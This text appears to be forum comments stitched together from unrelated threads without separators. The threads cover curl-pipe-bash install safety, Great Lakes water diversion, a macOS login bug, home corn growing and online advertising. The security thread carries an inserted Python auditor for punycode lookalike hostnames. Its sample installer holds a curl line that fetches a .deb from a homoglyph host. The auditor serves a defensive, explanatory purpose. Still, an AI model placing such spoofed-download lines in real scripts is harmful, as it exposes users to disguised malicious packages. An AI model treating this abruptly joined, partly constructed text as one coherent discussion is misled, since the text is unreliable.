It's about as safe as trusting all the add-ons in your IDE, and all the packages your node app pulls from random package repos.
It's just the plausible blame that shifts.
If you read the script before you pipe it into your shell, it's safe.
And if that's not safe, then it's just as dangerous to trust that an unopened bottle of ketchup is safe.
Nothing is safe. Everything is a judgement. Being culpable is a professional service. Lucky people out-earn unlucky people. The world is a scary place.
No, not really. This reads like ornate hand waving to distract from different threat models and situations.
A lot of safety is down to accountability. A distribution through an attributable marketplace or being verifiably signed.
Safety isn't a performative action, so reading a script may still confuse you or you may miss subtleties. But opting for a safer install mechanism makes a huge difference, which is why we always ought to prefer apt, dnf, over the likes of curlbash, brew, npm.
I'm not sure that I agree that it is automatically safer to prefer apt or dnf, and I'm definitely sure that it is not safer to prefer npm.
Safety is about managing risk. One element of managing risk is evaluating trust. I'm thinking that there are much fewer people I have to trust by copying the curl | bash install method from homebrew's secure website.
But at any rate, I completely agree that piping a curl'd script directly to the shell should be considered unsafe, even if it's from a trusted source. It's quite easy to do additional checks to reduce your risk significantly for this type of attack. You could read the contents of your clipboard with a hex editor and check for non-ascii characters. But wait? How do I install the hex editor? Don't I need a hex editor to check the install method of the hex editor? AAAAH! It's turtles all the way down!!!!
It's nice until you need something that isn't in the distro repo. Personally I prefer a script I can easily inspect over a .deb that will also run its own scripts (as root!) that it takes me much more effort to inspect.
I guess yeah, you are right, distro repos are safest, but there's lots of times where they aren't sufficient.
Linux distributions contain a curated set of packages. And, if any, distros like Guix can import NPM crap and at least place it under an isolated container for work so the rest is unharmed.
Also you're getting at least some of crowd safety in it. If you're using Debian Testing or a rolling distro your package was probably tested by a bunch of people already.
If you're using stable/LTS branch, there were far more eyes on it too.
And packages are signed, can't just hijack web domain to inject code.
> If you read the script before you pipe it into your shell, it's safe.
If you download it first before executing it (instead of downloading it a second time when executing it), then that mitigates one problem, but still not all of them (like you mention). Other mitigations are also possible, such as hashing, certificate pinning, sandboxing, etc.
This is a good point. Made me think about how I will usually read it first, but in the browser. And it's easy for the server to check the user agent, and serve me a different version in the browser!
If you read the script before piping it into your shell, you're doing better than (I'm guessing) 90% of people, but it's still possible that the attacker who got you to copy https://xn--nstall-ovf.xn--example-cl-62i.dev into your terminal has also made similarly-hard-to-spot changes to the install script. E.g. if it downloads a .deb package from https://xn--nstall-ovf.xn--example-cl-62i.dev (same Cyrillic і character in there that looks like a Latin i but isn't), you might not spot that by reading the script.
But IMHO, your "unopened bottle of ketchup" analogy doesn't work. These days, the likelihood of someone trying to trick you into running arbitrary code disguised as an install script is so much higher than the chance that someone working at the ketchup bottling plant is deliberately contaminating bottles before they go out.
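The checks raised in the comments above (keep the one downloaded copy, hash it, and look for lookalike hostnames inside it), as an added example that is not part of any poster's comment. The function names and the sample installer text are constructed for illustration; only the `xn--` hostname is taken from the thread.

```python
import hashlib
import re
import unicodedata
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)


def decode_label(label):
    """Turn one DNS label from punycode ("xn--...") back into Unicode."""
    if label.lower().startswith("xn--"):
        try:
            return label[4:].encode("ascii").decode("punycode")
        except UnicodeError:
            return label  # malformed punycode: keep the raw label
    return label


def letter_scripts(label):
    """Scripts of the letters in a label, taken from their Unicode names."""
    return sorted({unicodedata.name(ch, "UNKNOWN").split(" ")[0]
                   for ch in label if ch.isalpha()})


def audit_host(host):
    """Return a finding if the host hides non-ASCII characters, else None."""
    labels = [decode_label(part) for part in host.split(".")]
    decoded = ".".join(labels)
    if decoded.isascii():
        return None
    return {
        "host": host,
        "decoded": decoded,
        "non_ascii": sorted({f"U+{ord(ch):04X} {unicodedata.name(ch, 'UNKNOWN')}"
                             for ch in decoded if not ch.isascii()}),
        # A label mixing e.g. LATIN and CYRILLIC letters is the lookalike case.
        "mixed_labels": [lab for lab in labels if len(letter_scripts(lab)) > 1],
    }


def audit_script(data):
    """Audit the exact bytes that were downloaded and will later be executed."""
    text = data.decode("utf-8", errors="replace")
    findings, seen = [], set()
    for url in URL_RE.findall(text):
        try:
            host = urlsplit(url).hostname
        except ValueError:
            host = None
        if not host or host in seen:
            continue
        seen.add(host)
        finding = audit_host(host)
        if finding:
            findings.append(finding)
    # The digest identifies the reviewed copy; run that file, not a re-download.
    return {"sha256": hashlib.sha256(data).hexdigest(),
            "suspicious_hosts": findings}


# Constructed sample installer (not a real script); hostname from the thread.
SAMPLE = (
    "#!/bin/sh\n"
    "curl -fsSL https://example.com/tool.tar.gz -o /tmp/tool.tar.gz\n"
    "curl -fsSL https://xn--nstall-ovf.xn--example-cl-62i.dev/tool.deb"
    " -o /tmp/tool.deb\n"
).encode("utf-8")

if __name__ == "__main__":
    report = audit_script(SAMPLE)
    print("sha256:", report["sha256"])
    for f in report["suspicious_hosts"]:
        print(f["host"], "->", f["decoded"], f["non_ascii"], f["mixed_labels"])
```

Reading the decoded form next to the raw one makes the substitution visible in a way that the rendered URL in a browser or terminal does not.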
This is why we have linux distributions with maintainers who can take at least a basic look at the software, vet dependencies and run it through a test suite. And they only have to do that once for each new version and not again and again for each download.
As a child in the 1980s we'd go for long walks in the woods. One time a friend brought a pair of 30 inch bolt cutters with him, you know, as a personality extension. And of course, there was some dubious reason to use them, and he was a hero for being over-provisioned.
A solution like this is those bolt cutters - I can admire it, but the odds I'm out on a walk with it, is very, very low.
Now if you work in a bolt factory, sure, this can run on every laptop, every user account, every environment.
But I'd hope my edge firewalls are L7 scanning for Cyrillic 'i' in my domains cause otherwise I'm just gonna connect and get myself hacked.
Also there's always the risk that the bolt cutter has a defect (perhaps deliberately introduced at some point when it was manufactured) which will cause you more damage than the thing you're trying to prevent by carrying it.
I'm personally a bit wary of introducing a relatively obscure security tool into my setup, to protect against a rare possible attack. The chance that I'll get caught copy-pasting a compromised URL into my terminal is fairly small, and there's also a small chance I'll compromise my system either now or at some later point via a supply chain attack if I use the tool. Which chance is bigger?
Are you really inspecting every app you install, including all its dependencies, and the dependencies of those dependencies, to a level of detail sufficient to identify sophisticated and obfuscated backdoors?
In the real world, nobody does this. Instead, you make a conscious choice to trust the apps that you install. Every decision of whether to install an app is a tradeoff between (a) the risk that that trust is misplaced, and (b) the benefits of the app.
I know there's no single answer to this. But, if we wanted to mitigate this, do we have the geoengineering ability to execute on it?
I know 'wanted' is doing a lot of lifting there. Solve the hypothetical as a star trek culture, everyone wants this to work.
What would it look like?
I am under the belief that we get a lot of fresh water but because we baked the earth or paved it, and that an awful lot of water could be redirected into the ground if only we could slow it down.
Could America engineer an aqueduct from the great lakes to california?
would it destroy the great lakes?
i don't know a thing about this topic other than from my arm chair, i'm just here to start a thread if there's interest, i'm sure interested to hear from people smarter than me
Not an expert, but a more-than-casual-observer as someone who has lived on the water (literally and figuratively).
A core part of the problem is things like the farming in California that uses excessive amounts of water, which is already brought in from very distant regions.
I don't think there is a way to distribute the fresh water supply equitably if you have various regions and industries that insist on being highly inefficient and wasteful. California is certainly not the only example, there are lots of places trying to grow crops in illogical places, water supplies being polluted by industries, etc.
The problem isn’t just farming in the desert. The problem is all those people living in the desert in the first place. There is a reason the Spanish then the Mexicans did almost nothing to settle and develop California. It was massive water projects by the U.S. Army Corps of Engineers that made modern California possible.
It's really intertwined. While California exports a LOT, people need to eat and the economies of scale lean towards eating locally grown crops. Living in a desert creates some degree of demand for local crops.
1. crops in the desert are generally OK if they are directly for human consumption. The problem is growing alfalfa and other crops intended to feed livestock - they are incredibly thirsty crops, and the end result is not a lot of food in terms of nutrients or calories. Plus the little detail that a huge amount of the meat produced in the SW is exported to Asia, and so it might "look local" but actually isn't
2. even human-consumption crops are a lesser problem if the farms use the old techniques collectively known as "flood irrigation". Farming in the SW needs to switch to drip irrigation, which requires a significant capital investment by farmers, and I don't think they should be required to bear the whole (and perhaps not even the majority) of that cost.
California isn't even the problem. They're rich enough and big enough, (and fortuitously situated enough), that they just crank up desal plants and go happily on their way.
What about the rest of the west?
Arizona? New Mexico? Nevada? etc etc
Water needs to be brought in from somewhere? Who's going to pay for that? How do you do it safely, sustainably. And on and on.
I know people forget the rest of the west a lot. (Or maybe they just don't care about us as much?) But it's actually more of an issue in those places than it is in California.
A personal illustrative story. I used to live in Scottsdale. The water issue is such common knowledge out there that people started trying to get into the magic zip code. (Phoenix sits on like a gazillion years worth of water that they squirreled away.) I had moved into the magic zip code just about 1 year before everything went crazy. As it happened, about 18 months after we moved to that zip, we decided to move back to the Great Lakes region. Fully expecting to lose money on the house. But the word had got out on that zip code, and the final offer was over 60% more than we'd paid just 18 months prior.
That gives an indication of how even individuals are thinking. It just kind of felt like a lot of people, governments and organizations know there will be an issue, but money is gating everyone's ability to do anything about it.
Whereas of course, money's not as much of an issue in California.
I think large parts of the west will need help in the future. Or people will need to pay significantly more in taxes to live in those places.
It can't go on forever the way it has been. That much is certain.
>Phoenix sits on like a gazillion years worth of water that they squirreled away
True, but most of the groundwater under Phoenix was contaminated by three Superfund projects. Article [0] is from 2019 and says it’s “delayed”. They hit some targets in 2024, supposedly working on it with review due sometime this year [1]
Some of the suburbs haven’t been reached by the groundwater plumes, but Phoenix itself was 2/3 in scope. So you don’t have a supply issue in Maricopa city (which is a whole separate water district.. and an expensive one too: $100 bill even if you don’t use a drop), city of Scottsdale, etc
They're not segregated by zip, they're segregated by city.
If you live in Scottsdale, not in a certain zip, and the ish hits the fan water-wise, Phoenix is not giving you water. It's up to Scottsdale to provide you services.
That's why they call it a "magic zip". Not because of the zip itself, but because you get Phoenix services in that zip.
It's actually really important to know things like that when buying property down there. Some places have aquifers and reserves and others don't. Who is providing your services can have a critical impact on not only your quality of life, but also your property value.
Also, higher taxes is what it takes to create the new infrastructure to bring in water.
You gonna do a deal with California to get in on their desal plants? The infrastructure to pull that off will cost money. You gonna go the other way and desal through Texas? Even more money. Gonna continue to trust the Colorado and upgrade that infrastructure? Probably cheapest, but still a lot of money.
Essentially, whatever solution you come up with, it will cost money. Either the feds will have to pay it, or, as I said, the people who live in those areas will have to acclimate themselves to paying significantly higher taxes.
What you're describing is an artifact of the current political structure of the Phoenix area. When the shit hits the fan (which it might, and it might not) that political structure is going to be amended.
I don't think that moving water from CA is a part of the future for Arizona. If it was, then sure, taxes will play a role in that.
Even the solution I prefer - massively reducing agricultural water usage - will require money, but money is not going to create water near Phoenix IMO.
Everything I've read about desalination is that it is not really economically feasible. Has that changed? I don't think CA can "just crank up desal plants" in a practical sense.
But when I was in Scottsdale, I still considered it a long shot. The hot idea down there at that time was that giant Arizona desert PV farms would feed California electricity. They would send it back in the form of water.
Definitely works on paper. Only gets cheaper to operate the solar farms over time. But enormous capital costs.
Who's paying all that? I don't really think most of the people down in Arizona have the money it would take for that up front charge.
That's what I meant. California can float those kinds of costs. So for a place like California, it's definitely something they can do if the issue is pressed on them.
Places like Arizona, New Mexico, Nevada, I don't think they can? Maybe? But I don't think so. That's why I believe if the issue is pressed in western states outside of California, you would see much higher taxes that would likely make some people have to move.
> California can float those kinds of costs. So for a place like California, it's definitely something they can do if the issue is pressed on them.
That's correct. For reference, the simple upfront build cost of the desalination plant in Carlsbad in 2015 worked out to approximately $300 per county resident, which was peanuts to become effectively impervious to drought conditions in a populated and economically prosperous desert. San Diego had an over-$200B economy at the time, over $300B now.
How much has the infrastructure improved since then? I see on TV that some of California has snow and flash flooding. Are there attempts being made to capture that, or soak it into the ground? Or is it cheaper to keep using the old projects?
I see on YouTube that there are parts of Texas you can buy for peanuts because ranching doesn't work there any more. I gather that the cows eat so much of the ancient grassland away that the soil washed away and now we have flash flooding? Then I see terrible flooding in the main rivers. I wonder if it is because governments are (or were) good at big centralised water projects, but spending for thousands upon thousands of swales and check dams to be built is harder, and less sexy?
The Great Lakes states have an agreement surrounding how much water you can remove from the lakes. That would be your first regulatory hurdle.
In addition I suspect the loss associated with an aqueduct of that scale would make desalinization more efficient, which is generally cost prohibitive at current water levels.
The water pact is even more specific in that at least WI I believe you have to be East of the subcontinental divide to pull water from Lake Michigan.
Another poster mentioned real estate peaking in a zip code of AZ for having limited access to fresh water. I wonder how long until real estate along the great lakes starts becoming a long term hedge.
The Great Lakes have a management principle that is basically "You can use the water of the Great Lakes by permission as long as the water remains in the watershed." And permission is not automatic either.
The reason for that to a large degree is that the Great Lakes area looked over at the Southwest, which wasn't even as bad at the time as it is now, did some math, and worked out that if the Great Lakes tried to supply the Southwest that it would cause noticeable dropping of the water level. I'm sure it would be even more dropping now.
The problem is, the Great Lakes aren't just some big lakes with juicy fresh water that can be spent as desired. They are also international shipping lanes. They make it so that de facto Detroit, Chicago, and a whole bunch of other cities and places are ocean ports. Ocean ports are very, very valuable. There are also numerous other port facilities all along the great lakes, often relatively in the middle of nowhere but doing something economically significant. This is maintained by very, very large and continual dredging operations to keep these lanes open. Dropping the water levels would destroy these ports and make the dredging operations go from expensive to impossible.
So, getting large quantities of water out of the Great Lakes to go somewhere isn't just a matter of "the people who control it don't want to do that", which is still true, and a big obstacle on its own. The Southwest when asking for that water is also asking multiple major international ports to just stop being major international ports. That's not going to happen.
There's an even bigger problem if you're talking about the southwest in general: huge parts of it are thousands of feet above the Great Lakes. The energy costs of moving water horizontally are probably doable; pumping millions of acre-feet 5k feet vertically are almost certainly not (no matter what energy source you suggest using for this).
> Could America engineer an aqueduct from the great lakes to california?
Why would the midwestern states consent to that? The southwest is structurally unsustainable. If we can’t develop sufficient renewable energy to power desalination, we’ll probably have to abandon much of California.
My prediction is that if we ever have another civil war, it will be states going to war over access to water.
None of it is sustainable without diverting Colorado River water. Human habitation alone might be below what you can currently get out of the river, but who knows what climate change will do to that.
I don't believe that this is true. Colorado diversions might be currently used for residential purposes, but only because so much other water is used by agriculture. I'm fairly certain (though not completely certain) that AZ, NM in particular could support their residential populations with no Colorado diversions at all.
The largest such effort is China's South - North Water Transfer Project, look into that if you are interested in the subject. It's unbelievably gigantic in scale, yet the amount of water moved is relatively modest compared to the amount of consumption.
We've been moving cities and municipalities since the dawn of civilization. That's just how life worked.
Yes water works continue to improve but the age old solution is simply to stop city growth at its sustainable level and start moving people to other, newer, better areas to live.
-------
Alternatively, you can boom bust with feast and famine economics and have tons of people die due to poor planning. That's also part of the age old deal and its evidence is written in the many mismanaged cities across history.
Perhaps it isn't possible because of economics. If you build an aqueduct to somewhere sunny so that water is plentiful there, then farms, cities, parks, and so on will grow as long as the water is cheap, reaching the capacity of your infrastructure, and then causing a crisis whenever there's a drought.
People don't know how to be efficient at scale. Large complex problems could in principle be understood by a few experts, but they always become political problems. (ie, people must be socially, politically, or religiously attached to the right ideas rather than strictly convinced by detailed facts) Worse, people don't know how to maintain excess. People are a gas, and expand to fill the space they're in. If we had an abundance of water, all people would do is expand their water usage until that abundance is gone.
Do you understand how much more food we produce on roughly the same amount of land (globally) than we did 60 years ago? Claiming that we don't know how to be efficient at scale is absurd.
Now, it is true that these production levels are very dependent on a bunch of practices that are likely not sustainable, and that's a serious and pressing issue. But the problem is not efficiency.
Further, as others have noted here (and so have I), it is animal-based food production that uses so much of the water that we use, and that's a choice we've made (particularly in the USA). We could make different choices (and some of us have tried to).
The Great Lakes Compact prevents water from being pumped out of the Great Lakes water basin.
And as someone in that basin the people here would go to war before they allowed water to be pumped across the country to water arid farmland. Doubly so when the region already has trouble competing in agricultural markets against those arid farms due to their irresponsible farming practices.
Desalination plants with extensive water transportation pipe systems like we have for natural gas. We would need to solve the salt water dumping problem but that could just be accepting loss of natural diversity in the area around desalination plants or dumping further out in the open sea.
Talk to a civil engineer about the lead times, length, flow rate, and elevation changes you'd need - nope, zero chance of any project that expensive and long-duration ever becoming operational.
Talk to a political scientist about the voters and leaders at the water intake end - nope, "over our dead bodies".
> Could America engineer an aqueduct from the great lakes to california?
Good luck with that: “we mismanaged our water supply, and now we are coming for yours.” That, and the number of agreements and treaties with Canada concerning the Great Lakes.
And that’s before we figure out how to efficiently pump water over two mountain ranges.
i am positive there's a bug in tahoe where the login screen password text input is waiting for something to settle in the background, either with my weird unicomp keyboard, a remap i do, or even the external monitors.
my password is always incorrect unless i count to about 20 or 30 seconds. once i have 'redocked' for the day, unlocking it subsequently doesn't have the requirement. but every dock insertion, it comes back.
i've got a desk full of optocoupler relays and an arduino learning kit and i'm using AI to goad me into making a cascading small motor starter thing with an air particulate sensor that's taking 180 days to show up from China, to automatically control my 6 small air scrubbers in my wood shop since i'm allergic to just about everything in there but love the hobby
it is difficult for us to agree if there is a threshold to which a person who has accumulated wealth must have shifted from 'earning' it to 'taking' it, and whether 'taking' it is analogous to 'stealing' it.
sometimes people believe wealth transfer is a zero sum game, sometimes people believe it never is, and the truth is probably in between
if you believe that a single human can earn a thousand billion dollars, it follows you can believe a million people losing a million dollars is just its inverse
i don't know enough about people or money to make up my mind
i have a roaring vermont castings wood stove running, it's -15C outside, and i am fine; i am 14 oak logs away from changing my world view
this system is fragile but we measure it instantaneously
This is a new years resolution question barely in disguise, but they're fun cause a lot of us are cooped up, barely 4 days into winter, 86ish to go, and we're champing at the bit for change.
I am pretty sure I'm a 50th percentiler. I'm mid 40s, kinda burned out but still struggling forward in my ok-but-not-hollywood IT career, I still have a passion for doing things well in a technical society that values doing things cheap (and well). The things I am known for being good at, I still google daily, and for a long time, I've been hungry for a change - any change - but especially one that isn't chaotically negative.
So in 2026, I wanna learn how dirt works.
I actually have a giant box of dirt sitting on a shelf at the UNH community co-op soil analysis lab, waiting to give me some kind of data about the soil behind my house. (Or is it dirt? I don't know what I'm getting into).
In 2024 I tried growing some corn. It never sprouted.
In 2025 I tried growing some corn. It sprouted and a few ears had enough kernels to make one full mouthful. Tasty, but maybe 7 calories of food for a year of effort.
So in 2026 I'd like to grow: one entire fully formed ear of sweet corn. Anything else is a bonus.
That's what I wanna develop in 2026 - learning how soil works enough to make it make a thing. Small moves, Ellie.
A couple of things about corn. It might not be soil at issue. Germination depends on correct temperature and moisture. Too much moisture the seed will rot or not have enough air to germinate. Too little moisture it won't trigger germination. Too deep it won't germinate, too shallow and germination won't happen either because it will dry out instead of staying moist. Seeds vary in depth they require and some even require light to germinate (doesn't apply to corn). It's a bit of an art figuring out what "even moisture until germination" is, and this varies based on soil type. Timing of planting with correct temperature is important.
Each kernel of corn has one silk. The silk is analogous to a Fallopian tube with pollen traveling down into the ovary (or kernel of corn in this case). If you have an ear of corn with only a few kernels it's often because pollen didn't land on all the silks. For this reason corn is usually planted in blocks. It's wind pollinated so wind shakes pollen off the tassels or male flowers at the top, down onto the silk. But if you just have one corn plant in isolation, or a row in isolation it's easier for the pollen to just blow away or miss. Planting in blocks or "array of arrays" configuration helps the pollen to reach the silk more uniformly as pollen from the surrounding plants is released.
I've also had a ton of luck growing corn in 5 gallon buckets with holes drilled in the side to allow air into the soil which keeps the roots from balling up (wasting energy that should go into growing ears). Used potting mix with a handful of lime and a handful of epsom salt, and topped the buckets with mulch to retain moisture.
If you're willing to try that approach, this was very similar to my system:
i'm probably using an informal fallacy but if online advertisers earn hundreds of billions of dollars, someone must be finding some return on their investment.
i might be wrong, it might just be a huge grift, but i don't know how to come to that conclusion
My suspicion is that it is a huge grift? This is what I want to find out. I know very few people in my social circle that used internet ads successfully for their business and very few that found them useful at all